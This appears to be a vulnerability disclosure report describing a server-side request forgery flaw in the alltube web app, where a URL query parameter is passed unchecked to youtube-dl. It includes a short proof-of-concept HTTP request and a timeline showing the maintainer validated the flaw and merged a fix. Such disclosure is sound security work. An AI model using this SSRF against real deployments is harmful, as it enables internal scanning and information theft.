Server-Side Request Forgery (SSRF) in rudloff/alltube


Reported on

Feb 26th 2022


Alltube takes URL from the query parameter and directly uses it in the youtube-dl command, It makes any unauthenticated attacker can perform an SSRF attack and pass internal hostnames in the URL parameter and obtain information about that service from the response.

Proof of Concept

GET /alltube/index.php/info?url= HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close



This vulnerability is capable of internal port scanning and obtaining sensitive information about services on localhost and sending requests to them.

We are processing your report and will contact the rudloff/alltube team within 24 hours. 3 months ago
We have contacted a member of the rudloff/alltube team and are waiting to hear back 3 months ago
Pierre Rudloff modified the report
3 months ago
Pierre Rudloff validated this vulnerability 3 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Rudloff confirmed that a fix has been merged on 148a17 3 months ago
The fix bounty has been dropped
DownloadController.php#L46 has been validated
to join this conversation